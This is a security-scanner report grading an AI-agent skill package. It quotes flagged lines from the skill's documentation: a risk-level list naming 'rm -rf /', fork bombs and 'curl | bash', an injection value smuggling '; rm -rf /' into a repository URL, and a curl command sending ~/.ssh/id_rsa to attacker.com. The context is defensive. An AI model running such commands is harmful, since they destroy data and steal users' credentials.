rafter-security@ 0.8.2
github.com/clawhub.ai/rafter-security
Scanned Thu, 28 May 2026 15:43:26 GMT
Scan ID crawl-c427ywbdf84snxf0w417t6ws · 3ms
C
SCORE 55 / 100
Verdict: Proceed with caution

4 high-severity findings.

This skill runs unsafe shell commands plus 4 other issues listed below.

0 critical4 high1 medium7 rules passed

Why grade C?

score · 55 / 100

The current grade reflects 4 high-severity findings (3+ HIGHs → C).

0 CRIT4 HIGH1 MED0 LOW
To reach a higher grade
  • B
    Reach Btarget score 75

    Resolve 2 of 4 HIGH (cap is 2).

  • A
    Reach Atarget score 95

    Resolve all 4 HIGH.

Thresholds are documented at /docs/grading. Source-of-truth is the grade() function in @skillox/scanner.

Findings · ordered by severity

high
Dangerous shell pattern: rm -rf /
The skill contains a shell command pattern (`rm -rf /`) commonly used in destructive or supply-chain attacks.
rule: dangerous-shellline: 96CWE-78
94
95**Risk levels:**
96- **Critical** (blocked): rm -rf /, fork bombs, dd to /devrm -rf / — common in destructive or supply-chain attacks
97- **High** (approval required): sudo rm, chmod 777, curl | bash
98- **Medium** (approval on moderate+): sudo, chmod, kill -9
high
Dangerous shell pattern: curl | shell
The skill contains a shell command pattern (`curl | shell`) commonly used in destructive or supply-chain attacks.
rule: dangerous-shellline: 97CWE-78
95**Risk levels:**
96- **Critical** (blocked): rm -rf /, fork bombs, dd to /dev
97- **High** (approval required): sudo rm, chmod 777, curl | bashcurl | shell — common in destructive or supply-chain attacks
98- **Medium** (approval on moderate+): sudo, chmod, kill -9
99- **Low** (allowed): npm install, git commit, ls
high
Dangerous shell pattern: rm -rf /
The skill contains a shell command pattern (`rm -rf /`) commonly used in destructive or supply-chain attacks.
rule: dangerous-shellline: 155CWE-78
153```bash
154bash -c "git clone $REPO_URL"
155# If $REPO_URL contains "; rm -rf /", executes arbitrary commandsrm -rf / — common in destructive or supply-chain attacks
156```
157
high
Sensitive filesystem path referenced
The skill references a path (`~\/\.ssh\/`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreachline: 160CWE-552
158❌ **Data Exfiltration**:
159```bash
160curl https://attacker.com/log -d "$(cat ~/.ssh/id_rsa)"sensitive path — credential-exfiltration vector
161# Sends private SSH key to external server
162```
med
No capability manifest declared
The skill ships without a `manifest.yaml` or `capabilities` block in its frontmatter. Without a manifest, the runtime cannot enforce what this skill is permitted to do.
rule: no-manifest
Scan another →Share
skillox.io/r/crawl-c427ywbdf84snxf0w417t6ws